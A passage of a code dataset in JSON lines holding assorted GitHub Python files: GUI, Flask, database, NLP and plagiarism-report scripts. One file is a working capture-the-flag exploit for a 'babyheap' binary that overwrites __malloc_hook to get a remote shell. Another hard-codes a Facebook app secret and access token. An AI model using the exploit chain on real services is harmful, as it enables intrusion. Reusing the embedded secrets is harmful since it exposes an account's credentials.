(cm):',font=('arial',14))\nL1.grid(row=0,column=0,padx=30,pady=15,sticky = 'w')\nE1 = Entry(master = F1, font =('arial',15), width = 12)\nE1.grid(row=1,column=0,padx=30,sticky ='w')\nL2= Label(master = F1, text = 'CÂN NẶNG (kg):',font=('arial',14))\nL2.grid(row=2,column=0,padx=30,pady=15,sticky ='w')\nE2 = Entry(master =F1,font =('arial',15), width = 12)\nE2.grid(row=3,column=0,padx=30,sticky = 'w')\n\ndef R_click():\n if x.get()==0:\n L1.configure(text='CHIỀU CAO (cm):')\n L2.configure(text='CÂN NẶNG (kg):')\n a=E1.get()\n else:\n L1.configure(text='CHIỀU CAO (Inches):')\n L2.configure(text='CÂN NẶNG (Pounds):')\n\nR1 = Radiobutton(master = F2,text = 'Metric',font=('arial',14),value =0,variable=x,command=R_click)\nR1.grid(row=0,column=0,pady=20,sticky='w')\nR2 = Radiobutton(master = F2,text = 'English',font=('arial',14),value=1,variable=x,command=R_click)\nR2.grid(row=1,column=0,sticky='w')\n\ndef B_click():\n if x.get()==0:\n a = float(E1.get())/100\n b = float(E2.get())\n BMI = round(b/(a*a),2)\n L3.configure(text = 'BMI= '+ str(BMI))\n else:\n a = float(E1.get())\n b = float(E2.get())\n BMI = round(b/(a*a)*703,2)\n L3.configure(text = 'BMI= '+ str(BMI))\nB=Button(w,text='CALCULATE',font =('arial',15),command =B_click)\nB.place(x=150,y=220)\nL3=Label(w,text ='BMI= ',font =('arial',15),fg ='green')\nL3.place(x=180,y=280)\n\nw.mainloop()\n","repo_name":"Chi68P1/Lap_trinh_python","sub_path":"BT/BMI 2.0.py","file_name":"BMI 2.0.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41464893402","text":"import os\nimport json\nfrom flask import Flask, request, Response\nfrom tensorflow.keras.models import load_model\nfrom helpers.functions import read_and_prep_images, read_and_prep_image_from_url\n# from helpers.functions import read_and_prep_images, read_and_prep_images2\napp = Flask(__name__)\n\n\nPATH_MODEL = './models/jan_model_trainingv3.h5'\n# CLASSES = ['cellphone', 'digitalwatch', 'headphone',\n# 'laptop', 'speaker', 'tablet', 'television'] #v2\nCLASSES = ['cellphone', 'digitalwatch', 'headphone',\n 'laptop', 'television'] #v3\n\n# image_paths = ['test.png']\n# image_data = read_and_prep_images(image_paths)\n\nnew_model = load_model(PATH_MODEL)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef test():\n return Response(\"Proyecto Final Server\", status=200)\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef healthcheck():\n url = request.json['url']\n\n image_data = read_and_prep_image_from_url(url)\n predictions = new_model.predict(image_data)\n most_accurrate_prediction = predictions.argmax(axis=1)[0]\n \n most_accurrate_prediction = CLASSES[most_accurrate_prediction]\n response = {\n 'prediction': most_accurrate_prediction\n }\n\n return Response(json.dumps(response), status=200, mimetype='application/json')\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(debug=True, host='0.0.0.0', port=port)\n\n # app.run(threaded=True, port=5000)\n # app.run(host=\"0.0.0.0\")\n","repo_name":"ronal2s/server-picture-classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43018739628","text":"# --------------------------------------------------------------------\n# sqlhelperModel\n#\n# 单例模式的SQLhelper\n# 使用类实现的sqlhelper,利用了数据库连接池的方法、原生pymysql、栈、线程\n# 利用栈和线程维护一个栈,这样就可以使用with语句实现不同的连接可关可开\n#\n# 其他文件直接引入对应的查询方法即可,例\n# index.py文件\n# from flask import current_app\n# db = current_app.DataBase\n# def index():\n# res = db.fetchone(\"select * from %s\", \"AAA\")\n#\n# 使用with语句\n# index.py文件\n# from flask import current_app\n# db = current_app.DataBase\n# def index():\n# with db as curse:\n# curse.execute(\"XXXXXXXXXXXX\")\n# ----------------------------------------------------------------------\nimport pymysql\n# 老版本1.30以前用法\n# from DBUtils.PooledDB import PooledDB\nfrom dbutils.pooled_db import PooledDB\nimport threading\n\n\nclass SqlHelper(object):\n def __init__(self, HOST, PORT, USER, PASSWORD, DATABASE):\n # 创建一个连接池\n self.POOL = PooledDB(\n creator=pymysql,\n maxconnections=None,\n blocking=True,\n ping=0,\n\n # 以下正常的数据库连接\n host=HOST,\n port=PORT,\n user=USER,\n password=PASSWORD,\n database=DATABASE,\n charset='utf8'\n # host='127.0.0.1',\n # port=3306,\n # user='root',\n # password='',\n # database='code_miaomu',\n # charset='utf8'\n )\n self.local = threading.local()\n\n def open(self):\n conn = self.POOL.connection()\n cursor = conn.cursor()\n return conn, cursor\n\n def close(self, cursor, conn):\n cursor.close()\n # 因为使用了连接池,这不是释放连接,而是放回连接池\n conn.close()\n\n # 定义一个查询样例\n # def fetchone(self, sql, *args):\n # result = self.cursor.fetchone(sql, args)\n # return result\n\n # with上下文所利用的类\n def __enter__(self):\n conn, cursor = self.open()\n # 获取rv中stack的值\n rv = getattr(self.local, 'stack', None)\n # 如果rv为空,向rv中添加初始化数据\n # 如果rv中有值,向rv中添加新创建的连接信息\n if not rv:\n self.local.stack = [(conn, cursor), ]\n else:\n self.local.stack = rv.append((conn, cursor))\n return cursor\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n rv = getattr(self.local, 'stack', None)\n # rv为空就删除stack,因为已经什么都没了\n # 如果有,就弹出关闭连接\n if not rv:\n del self.local.stack\n\n else:\n conn, cursor = rv.pop()\n self.close(conn, cursor)\n","repo_name":"WillOfTree/whiteZe","sub_path":"D_WEB框架/Flask/Flask_example/flask_web/models/SqlHelperModel.py","file_name":"SqlHelperModel.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2052282981","text":"import json\nfrom transformers import RobertaTokenizer\ntokenizer = RobertaTokenizer.from_pretrained(\"roberta-large\")\nmask_id = tokenizer.mask_token_id\n\ndef create_blocks_from_plain_text(sentences, doc_idx, max_seq_length=256):\n input_ids = tokenizer._batch_encode_plus(sentences)[\"input_ids\"]\n assert type(input_ids)==list\n\n curr_input_ids_list = [[]]\n for tokens in input_ids:\n\n if mask_id in tokens:\n # sometimes, the raw text contains [MASK]. in this case, we skip.\n continue\n\n if len(tokens) + len(curr_input_ids_list[-1]) <= max_seq_length:\n curr_input_ids_list[-1] += tokens\n elif len(tokens) <= max_seq_length:\n curr_input_ids_list.append(tokens)\n else:\n while len(tokens) > max_seq_length:\n th = max_seq_length-len(curr_input_ids_list[-1])\n curr_input_ids_list[-1] += tokens[:th]\n tokens = tokens[th:]\n curr_input_ids_list.append([])\n if len(tokens)>0:\n curr_input_ids_list[-1] += tokens\n\n output_lines = []\n n_tokens = []\n for block_idx, _input_ids in enumerate(curr_input_ids_list):\n assert 0 old_mgroups.similarity:\n parsed_comparisons[key] = new_mgroups\n\n return parsed_comparisons\n\n\ndef all_elements_same(lst):\n if len(lst) == 0:\n return True\n first_element = lst[0]\n for element in lst:\n if element != first_element:\n return False\n return True\n\n\ndef select_clusters(clusters, sim_threshold, grouped=False):\n selected_clusters = []\n for cluster in clusters:\n avg_similarity = cluster['avg_similarity']\n members_list = sorted(cluster['members'])\n\n members = []\n if not grouped:\n for member in members_list:\n sp_match = FNAME_REGEX.match(member)\n assert sp_match is not None\n\n gid = int(sp_match.group(1))\n nsub = int(sp_match.group(2))\n score = float(sp_match.group(3))\n\n members.append((gid, score, nsub, member))\n else:\n members = [int(m) for m in members_list]\n\n # sort by gid, then score and nsub (single subs) or \n # sort by group\n members.sort()\n\n if avg_similarity >= sim_threshold:\n new_cluster = copy.copy(cluster)\n # if we are considering single subs, exclude the case where all\n # the subs come from the same group.\n if not grouped and \\\n not all_elements_same([m[0] for m in members]):\n\n new_cluster['groups'] = sorted(set([m[0] for m in members]))\n selected_clusters.append(new_cluster)\n\n if grouped:\n new_cluster['groups'] = members\n selected_clusters.append(new_cluster)\n\n return selected_clusters\n\n\n# parse CLI args with argparse\ndef cli_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('JPLAG_LOG',\n type=PathType(exists=True, type='file'),\n help='Jplag log file.')\n parser.add_argument('JPLAG_RESULTS',\n type=PathType(exists=True, type='file'),\n help='Jplag results in zip format.')\n parser.add_argument('-g', '--grouped',\n action='store_true',\n help=\"Submissions are analyzed grouped.\")\n parser.add_argument('-o', '--output',\n type=pathlib.Path,\n default=None,\n help=\"Base name for report fiiles \"\n \"[default: JPLAG_LOG].\")\n parser.add_argument('-s', '--similarity',\n type=float,\n default=None,\n help=\"Similarity threshold [default: 0.33].\")\n\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == '__main__':\n args = cli_args()\n\n with args.JPLAG_LOG.open('r') as logfp:\n log_data = [line.strip() for line in logfp.readlines()]\n\n comparisons = extract_comparisons(args.JPLAG_RESULTS,\n grouped=args.grouped)\n sorted_comparisons = [(k, v['similarity']) for k, v\n in sorted(comparisons.items(),\n key=lambda item: item[1]['similarity'],\n reverse=True\n )\n ]\n max_similarity = select_max_similarity_between_groups(sorted_comparisons,\n args.grouped)\n max_similarity_sorted = [group for group\n in sorted(max_similarity.items(),\n key=lambda item: item[1].similarity,\n reverse=True\n )\n ]\n\n if args.similarity:\n selected_groups = [group for key, group in max_similarity_sorted\n if group.similarity > args.similarity]\n else:\n selected_groups = [group for key, group in max_similarity_sorted[:10]]\n\n comp_output_file = None\n if args.output:\n comp_output_file = args.output.with_name(\n args.output.stem + '_report.csv'\n )\n else:\n comp_output_file = args.JPLAG_LOG.with_name(\n args.JPLAG_LOG.stem + '_report.csv'\n )\n with comp_output_file.open('w') as comp_outfp:\n csvwriter = csv.writer(comp_outfp, delimiter='\\t')\n\n # write header\n csvwriter.writerow(['gid1', 'gid2', 'similarity', 'filename'])\n\n for group in selected_groups:\n csvwriter.writerow(group)\n\n nclusters = 0\n clusters = []\n # parse cluster data from JPLAG logs\n for line in log_data:\n if CLUSTERING_REGEX.match(line):\n\n nclusters_match = NCLUSTERS_REGEX.match(line)\n if nclusters_match:\n nclusters = nclusters_match.group(1)\n else:\n cp_match = CLUSTERS_PARAM_REGEX.match(line)\n if cp_match:\n # print(\"--\", line)\n cl_strength = float(cp_match.group(1))\n cl_avg_similarity = float(cp_match.group(2))\n cl_members = set(cm.strip() for cm\n in cp_match.group(3).strip().split(','))\n\n clusters.append({'strength': cl_strength,\n 'avg_similarity': cl_avg_similarity,\n 'members': cl_members\n })\n\n cluster_similarity = args.similarity \\\n if args.similarity else CLUSTER_SIMILARITY_THRESHOLD\n selected_clusters = select_clusters(clusters,\n cluster_similarity,\n args.grouped)\n\n clusters_output_file = None\n if args.output:\n clusters_output_file = args.output.with_name(\n args.output.stem + '_clusters_report.csv'\n )\n else:\n clusters_output_file = args.JPLAG_LOG.with_name(\n args.JPLAG_LOG.stem + '_clusters_report.csv'\n )\n with clusters_output_file.open('w') as clusters_outfp:\n csvwriter = csv.writer(clusters_outfp, delimiter='\\t')\n\n # write header\n if not args.grouped:\n csvwriter.writerow(['groups', 'strength', 'avg_similarity',\n 'members'])\n else:\n # cluster members are redundant for groups, they are the groups\n # again\n csvwriter.writerow(['groups', 'strength', 'avg_similarity'])\n\n for cluster in selected_clusters:\n groups = ','.join([str(el) for el in cluster['groups']])\n strength = cluster['strength']\n avg_similarity = cluster['avg_similarity']\n\n if not args.grouped:\n members = ','.join([str(el) for el in cluster['members']])\n csvwriter.writerow([groups, strength, avg_similarity,\n members])\n else:\n csvwriter.writerow([groups, strength, avg_similarity])\n\n exit(0)\n","repo_name":"CristianCantoro/cms_check-plagiarism","sub_path":"scripts/report_jplag.py","file_name":"report_jplag.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36453775689","text":"# shuffle ,seperate data(mode), batch, recieve data\nimport numpy as np\nimport torch\n\n\n## hyper parameter\nBatch_size = 64\n\n\nclass Dataloader:\n def loader(self,dataset,mode,batch_size = None,shuffle = True):\n ratio = 0.7\n if shuffle:\n np.random.shuffle(dataset.numpy())\n dataset = torch.Tensor(dataset)\n\n if mode == 'Train':\n trainbatchdata = []\n traindata = dataset[0:int(ratio*len(dataset))]\n iterations = int(np.ceil(len(traindata)/batch_size))\n for i in range(iterations-1):\n trainbatchdata.append(traindata[i*batch_size:(i+1)*batch_size])\n trainbatchdata.append(traindata[(iterations-1)*batch_size:])\n return trainbatchdata\n elif mode == 'Test':\n testdata = dataset[int(ratio*len(dataset)):]\n return testdata\n\n\n\n\n","repo_name":"realleaf/Project_RRF","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6427713240","text":"#!/usr/bin/python\nfrom pwn import *\n\nHOST = '35.186.153.116'\nPORT = 7001\nchdir = '/MOUNT/contest/IJCTF2020-master/pwn/babyheap/'\nconfig = {\n 'elf': chdir + 'babyheap',\n 'libc': chdir + 'libc6_2.23-0ubuntu10_amd64.so',\n 'HOST': HOST,\n 'PORT': PORT,\n }\n\nINPUT_PROMPT = None\n\ndef _malloc(r, sz, data):\n\tr.sendlineafter('>','1')\n\tr.sendlineafter('size:',str(sz))\n\tr.sendafter('data:',data)\n\ndef _free(r, idx):\n\tr.sendlineafter('>','2')\n\tr.sendlineafter('idx:',str(idx))\n\ndef _print(r, idx):\n\tr.sendlineafter('>','3')\n\tr.sendlineafter('idx:',str(idx))\n\ndef exploit(r):\n\t_malloc(r,0x3f0,\"A\"*0x3f0)\t# 0\n\t_malloc(r,0x30,\"B\"*0x30)\t# 1\n\t_malloc(r,0x60,\"C\"*0x60)\t# 2\n\t_malloc(r,0x3f0,\"D\"*0x3f0)\t# 3\n\t_malloc(r,0x60,\"E\"*0x60)\t# 4\n\t\n\t_free(r,2)\n\t_malloc(r,0x68,\"c\"*0x68) # 2\n\tfor i in range(0x65,0x5f,-1):\n\t\t_free(r,2)\n\t\t_malloc(r,0x68,\"c\"*i+p16(0x4b0)) # 2\n\t_free(r,0)\n\t_free(r,3) # Trigger overlapping chunks\n\n\t_malloc(r,0x3f0,\"a\"*0x3f0) # 0\n\t_print(r,1)\n\tr.recvuntil('data: ')\n\tleak = u64(r.recvn(6).ljust(8,'\\x00'))\n\tlibc.address = leak - 0x3c4b78\n\toneshot = libc.address + 0xf02a4\n\tlog.info(\"Leak Addr: {:#x}\".format(leak))\n\tlog.info(\"Libc Addr: {:#x}\".format(libc.address))\n\n\t_free(r,4) # fastbin[0x70] -> 4\n\t_free(r,2) # fastbin[0x70] -> 2 -> 4\n\n\t_malloc(r,0x50,\"b\"*0x40 + p64(libc.symbols['__malloc_hook']-0x23) + p64(0))\n\t\n\tfor i in range(0x38+6,0x38-1,-1):\n\t\t_free(r,1)\n\t\tdata = \"b\"*i + \"\\x71\"\n\t\tdata += \"\\x00\" * (0x50 - len(data))\n\t\t_malloc(r,0x50, data)\n\t\n\t_malloc(r,0x60,\"d\"*0x60) # fastbin[0x70] -> __malloc_hook\n\t_malloc(r,0x60,\"\\x90\"*0x13+p64(oneshot)+\"\\x00\"*(0x60-0x13-0x8))\n\t_malloc(r,0x20,\"a\"*0x20)\n\n\tr.interactive()\n\n# ptrs:0x55eadf91f040\nif __name__ == '__main__':\n if \"elf\" in config.keys() and config[\"elf\"]:\n e = ELF(config[\"elf\"])\n if \"libc\" in config.keys() and config[\"libc\"]:\n libc = ELF(config[\"libc\"])\n\n context.log_level = 'debug'\n\n if len(sys.argv) > 1:\n r = remote(config[\"HOST\"], config[\"PORT\"])\n else:\n context.terminal=['tmux', 'splitw', '-h']\n r = process(e.path, env={'LD_PRELOAD':config['libc']})\n \n gdb.attach(r, gdbscript='''\n \tb *(0xa24+0x137)\n \tb *(process+171)\n \t''')\n exploit(r)","repo_name":"r4k0nb4k0n/CTF-Writeups","sub_path":"2020/ijctf_2020/pwn/babyheap/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1585449665","text":"import re\nwith open('401k-symbols.txt') as f:\n lines = f.readlines() # list containing lines of file\n # columns = [] # To store column names\n #\n i = 1\n for line in lines:\n line = line.strip() # remove leading/trailing white spaces\n print('\\n\\n')\n print(line)\n if line:\n if i % 3 == 1:\n columns = [item.strip() for item in line.split('(')]\n print(columns[0])\n print(columns[1][0:-1])\n elif i % 3 == 0:\n columns = [item.strip() for item in line.split('Investments')]\n print(columns[0])\n print(dir(re.search('\\d+', columns[1])))\n\n # d = {} # dictionary to store file data (each line)\n # data = [item.strip() for item in line.split(',')]\n # for index, elem in enumerate(data):\n # d[columns[index]] = data[index]\n #\n # my_list.append(d) # append dictionary to list\n #\n i = i + 1\n# # pretty printing list of dictionaries\n# print(json.dumps(my_list, indent=4))","repo_name":"hungple/ibm-401k","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1240266235","text":"import sys\nimport json\nimport requests\nimport codecs\nimport os.path\n\nfrom datetime import datetime\nfrom dateutil import parser\n\nAPP_ID = \"1759548447703049\"\nAPP_SECRET = \"38762800fe27a48cf3464838ea9b60ba\"\nGRAPH_URL = \"https://graph.facebook.com/\"\nVERSION = \"v2.8/\"\nEVENT_LIMIT = 25\n\nTEMP_ACCESS_TOKEN = \"EAAZAATMwwwAkBAP3vbvWNfUCVcnxaF1ZBFbBwlZB0hGSKmrPV7aKQxAt3nKk9lBJR2qk7ZBCWa6dtmfZADwmEU165A8ns0tMZC9VO7K0lX6cMz7KjfDn34eT0KYhzLaqaSX0kbo9KztLwCysxZAbvIcIUcKYyDZBhqEZD\" #2 months\n\nPAGE_ID = \"19268387803\" #Attica\n\nquery = GRAPH_URL + VERSION + PAGE_ID + \"/?fields=fan_count,name,events.limit(\" + str(EVENT_LIMIT) + \"){id,name,start_time,end_time,is_canceled,attending},albums{name,id,photos.limit(2000){source}}&access_token=\" + TEMP_ACCESS_TOKEN\n\n#Go to https://developers.facebook.com/docs/graph-api/reference/page/ for list of fields\nrequest = requests.get(query)\ndata = json.loads(request.text)\n\n#save_path = \"C:/Users/Kevin-Notebook/Desktop\"\n#complete_name = os.path.join(save_path, \"nameoffilehere.txt\")\n\nevents = data['events']\nevents = events['data']\nalbums = data['albums']\nalbums = albums['data']\n#print(events)\n\nfor event in events:\n if event['is_canceled']:\n continue\n \n print(\"Event: \" + event['name'])\n print(\"Event ID: \" + event['id'])\n startTime = datetime.strptime(event['start_time'], \"%Y-%m-%dT%H:%M:%S+0800\") #%z for timezone doesnt work\n endTime = datetime.strptime(event['end_time'], \"%Y-%m-%dT%H:%M:%S+0800\")\n print(\"From \" + str(startTime) + \" to \" + str(endTime))\n\n if 'attending' in event:\n attendees = event['attending']\n attendees = attendees['data']\n\n for attendee in attendees:\n print(\"Name: \" + attendee['name'])\n print(\"FB ID: \" + attendee['id'])\nprint(\"Number of events: {}\".format(len(events)))\n\nfor album in albums:\n if album['name'] == \"Untitled Album\":\n continue\n \n print(\"Album name: \" + album['name'])\n print(\"Album ID: \" + album['id'])\n\n photos = album['photos']\n photos = photos['data']\n \n for photo in photos:\n print(\"Photo source: \" + photo['source'])\n print(\"Photo ID: \" + photo['id'])\n print(\"Number of photos: {}\".format(len(photos)))\n \nprint(\"Number of albums: {}\".format(len(albums)))\n\n#file.close()\n\ndef getAttendeeLists(eventLimit):\n query = GRAPH_URL + VERSION + PAGE_ID + \"/?fields=fan_count,name,events.limit(\" + str(eventLimit) + \"){id,name,is_canceled,attending}&access_token=\" + TEMP_ACCESS_TOKEN\n\n request = requests.get(query)\n data = json.loads(request.text)\n\n events = data['events']\n events = events['data']\n eventDict = dict()\n\n for event in events:\n if event['is_canceled']:\n continue\n\n ev = (event['name'], event['id'])\n\n attendeeList = []\n if 'attending' in event:\n attendees = event['attending']\n attendees = attendees['data']\n\n for attendee in attendees:\n user = {'attendee_name': attendee['name'], 'attendee_id': attendee['id']}\n attendeeList.append(user)\n\n eventDict[ev] = attendeeList\n\n return eventDict","repo_name":"KevinWoofr/event-scraper","sub_path":"Automation Scripts/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23082732566","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/10/10 上午9:29\n# @Author : Hou Rong\n# @Site : \n# @File : test_stop_3_for.py\n# @Software: PyCharm\n\ntry:\n for i in range(10):\n for j in range(10):\n for k in range(10):\n print(i, j, k)\n if i == 1 and j == 1 and k == 1:\n raise StopIteration()\nexcept StopIteration:\n print('It Stopped')\n","repo_name":"20113261/platform_service","sub_path":"test/test_stop_3_for.py","file_name":"test_stop_3_for.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73074096807","text":"import math\n\ndef TwoSum(a,b):\n x = a + b\n z = x - a\n y = (a-(x-z))+(b-z)\n return x,y\n\ndef Split(a):\n z = a * (134217728.0 + 1.0)\n x = z - (z - a)\n y = a - x\n return x,y\n\n\ndef TwoPro(a,b):\n x = a * b\n ah,al = Split(a)\n bh,bl = Split(b)\n y = al * bl - (((x-ah*bh)-al*bh)-ah*bl)\n return x,y\n","repo_name":"yixin-09/NPTaylor","sub_path":"src/eft.py","file_name":"eft.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10226079429","text":"from os import name\nimport connexion\nfrom connexion import NoContent\nimport json\nimport os.path\nfrom datetime import datetime\nimport datetime\nfrom pykafka import KafkaClient\nfrom pykafka.common import OffsetType\nfrom threading import Thread\nfrom flask_cors import CORS, cross_origin\nimport yaml\nimport logging\nimport logging.config\n\nif \"TARGET_ENV\" in os.environ and os.environ[\"TARGET_ENV\"] == \"test\":\n print(\"In Test Environment\")\n app_conf_file = \"/config/app_conf.yml\"\n log_conf_file = \"/config/log_conf.yml\"\nelse:\n print(\"In Dev Environment\")\n app_conf_file = \"app_conf.yml\"\n log_conf_file = \"log_conf.yml\"\n\nwith open(app_conf_file, 'r') as f:\n app_config = yaml.safe_load(f.read())\n\nwith open(log_conf_file, 'r') as f:\n log_config = yaml.safe_load(f.read())\n logging.config.dictConfig(log_config)\n\nlogger = logging.getLogger('basicLogger')\n\nlogger.info(\"App Conf File: %s\" % app_conf_file)\nlogger.info(\"Log COnf File: %s\" % log_conf_file)\n\ndef get_update(index):\n \"\"\" Get Update in History \"\"\"\n hostname = \"%s:%d\" % (app_config[\"events\"][\"hostname\"],\n app_config[\"events\"][\"port\"])\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config[\"events\"][\"topic\"])]\n # Here we reset the offset on start so that we retrieve\n # messages at the beginning of the message queue.\n # To prevent the for loop from blocking, we set the timeout to\n # 100ms. There is a risk that this loop never stops if the\n # index is large and messages are constantly being received!\n consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n consumer_timeout_ms=1000)\n logger.info(\"Retrieving update at index %d\" % index)\n try:\n event_counter = 0\n for msg in consumer:\n msg_str = msg.value.decode('utf-8')\n msg = json.loads(msg_str)\n # Find the event at the index you want and\n # return code 200\n # i.e., return event, 200\n if msg[\"type\"] == \"update\" and event_counter == index:\n return msg, 200\n elif msg[\"type\"] == \"update\":\n event_counter += 1 \n except:\n logger.error(\"No more messages found\")\n\n logger.error(\"Could not find update at index %d\" % index)\n return { \"message\": \"Not Found\"}, 404\n\ndef get_order(index):\n \"\"\" Get Order in History \"\"\"\n hostname = \"%s:%d\" % (app_config[\"events\"][\"hostname\"],\n app_config[\"events\"][\"port\"])\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config[\"events\"][\"topic\"])]\n # Here we reset the offset on start so that we retrieve\n # messages at the beginning of the message queue.\n # To prevent the for loop from blocking, we set the timeout to\n # 100ms. There is a risk that this loop never stops if the\n # index is large and messages are constantly being received!\n consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n consumer_timeout_ms=1000)\n logger.info(\"Retrieving order at index %d\" % index)\n try:\n event_counter = 0\n for msg in consumer:\n msg_str = msg.value.decode('utf-8')\n msg = json.loads(msg_str)\n # Find the event at the index you want and\n # return code 200\n # i.e., return event, 200\n if msg[\"type\"] == \"order\" and event_counter == index:\n return msg, 200\n elif msg[\"type\"] == \"order\":\n event_counter += 1\n except:\n logger.error(\"No more messages found\")\n\n logger.error(\"Could not find order at index %d\" % index)\n return { \"message\": \"Not Found\"}, 404\n\napp = connexion.FlaskApp(__name__, specification_dir='')\napp.add_api(\"ZCACIT3855-Inventory-API-1.0.0-swagger.yaml\", base_path=\"/audit_log\", strict_validation=True, validate_responses=True)\nif \"TARGET_ENV\" not in os.environ or os.environ[\"TARGET_ENV\"] != \"test\": \n CORS(app.app) \n app.app.config['CORS_HEADERS'] = 'Content-Type'\n\nif __name__ == \"__main__\":\n app.run(port=8200)\n","repo_name":"ZC729/acit3855docker","sub_path":"audit_log/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7099599921","text":"\nimport bdb\n\nfrom app.backend.models.firmware_models import *\n\n# CryptoKey\nfrom app.backend.models.user import User\n\n\n\ndef add_update_device_infor(id, manufacturer, model_name, firmware_version, is_discontinued,cve_list,device_type,firmware_info,latest_firmware_info,cve_id,cvss,name,version,sha2,release_date,download_url):\n if id:\n deviceinfor=DeviceInfo.query.filter_by(id=id).first()\n deviceinfor.manufacturer=manufacturer if manufacturer else deviceinfor.manufacturer\n deviceinfor.model_name=model_name if model_name else deviceinfor.model_name\n deviceinfor.firmware_version=firmware_version if firmware_version else deviceinfor.firmware_version\n deviceinfor.is_discontinued=is_discontinued if is_discontinued else is_discontinued\n deviceinfor.cve_list=cve_list if cve_list else deviceinfor.cve_list\n deviceinfor.device_type=device_type if device_type else deviceinfor.device_type\n deviceinfor.firmware_info=firmware_info if firmware_info else deviceinfor.firmware_info\n deviceinfor.latest_firmware_info=latest_firmware_info if latest_firmware_info else deviceinfor.latest_firmware_info\n\n vulnerability=Vulnerability.query.filter_by(id=id).first()\n vulnerability.cve_id=cve_id if cve_id else vulnerability.cve_id\n vulnerability.cvss=int(cvss) if cvss else vulnerability.cvss\n\n firminfor=FirmwareInfo.query.filter_by(id=id).first()\n firminfor.name=name if name else firminfor.name\n firminfor.version=version if version else firminfor.version\n firminfor.sha2=sha2 if sha2 else firminfor.sha2\n firminfor.release_date=release_date if release_date else firminfor.release_date\n firminfor.download_url=download_url if download_url else firminfor.download_url\n\n db.session.commit()\n else:\n data = dict(\n manufacturer=str(manufacturer),\n model_name=str(model_name),\n firmware_version=str(firmware_version),\n is_discontinued=str(is_discontinued),\n cve_list=str(cve_list),\n device_type=str(device_type),\n firmware_info=str(firmware_info),\n latest_firmware_info=latest_firmware_info\n )\n data0=dict(\n cve_id=str(cve_id),\n cvss=cvss\n )\n data1=dict(\n name=str(name),\n version=str(version),\n sha2=str(sha2),\n release_date=str(release_date),\n download_url=str(download_url)\n )\n df = DeviceInfo(**data)\n df0=Vulnerability(**data0)\n df1=FirmwareInfo(**data1)\n\n db.session.add(df)\n db.session.add(df0)\n db.session.add(df1)\n db.session.commit()\n\n\n\ndef add_update_device_features(id, snmp_sysdescr, snmp_sysoid , ftp_banner, telnet_banner,hostname,http_response,https_response,upnp_response,nic_mac):\n if id:\n devicefeatures=DeviceFeatures.query.filter_by(id=id).first()\n devicefeatures.snmp_sysdescr=snmp_sysdescr if snmp_sysdescr else devicefeatures.snmp_sysdescr\n devicefeatures.snmp_sysoid=snmp_sysoid if snmp_sysdescr else devicefeatures.snmp_sysoid\n devicefeatures.ftp_banner=ftp_banner if ftp_banner else devicefeatures.ftp_banner\n devicefeatures.telnet_banner=telnet_banner if telnet_banner else devicefeatures.telnet_banner\n devicefeatures.hostname=hostname if hostname else devicefeatures.hostname\n devicefeatures.http_response=http_response if http_response else devicefeatures.http_response\n devicefeatures.https_response=https_response if https_response else devicefeatures.https_response\n devicefeatures.upnp_response=upnp_response if upnp_response else devicefeatures.upnp_response\n devicefeatures.nic_mac=nic_mac if nic_mac else devicefeatures.nic_mac\n db.session.commit()\n else:\n current = DeviceFeatures.query.filter_by(snmp_sysdescr=snmp_sysdescr).first()\n if current:\n return None\n data = dict(\n snmp_sysdescr=str(snmp_sysdescr),\n snmp_sysoid=str(snmp_sysoid),\n ftp_banner=str(ftp_banner),\n telnet_banner=str(telnet_banner),\n hostname=str(hostname),\n http_response=str(http_response),\n https_response=str(https_response),\n upnp_response=str(upnp_response),\n nic_mac=str(nic_mac)\n )\n df = DeviceFeatures(**data)\n\n db.session.add(df)\n db.session.commit()\n\n\ndef use_report1(listx):\n for index in range(len(listx)):\n ip = list(listx[index].keys())[0]\n os = listx[index][ip].get(\"os\", \"null\")\n vendor = listx[index][ip].get(\"vendor\", \"null\")\n model_name = listx[index][ip].get('model_name', '')\n firmware_version = listx[index][ip].get('firmware_version', '')\n is_discontinued = listx[index][ip].get('is_discontinued', '')\n cve_list = list(listx[index][ip].keys())[5]\n cve_id = []\n cvss = []\n for i in range(len(listx[index][ip][cve_list])):\n 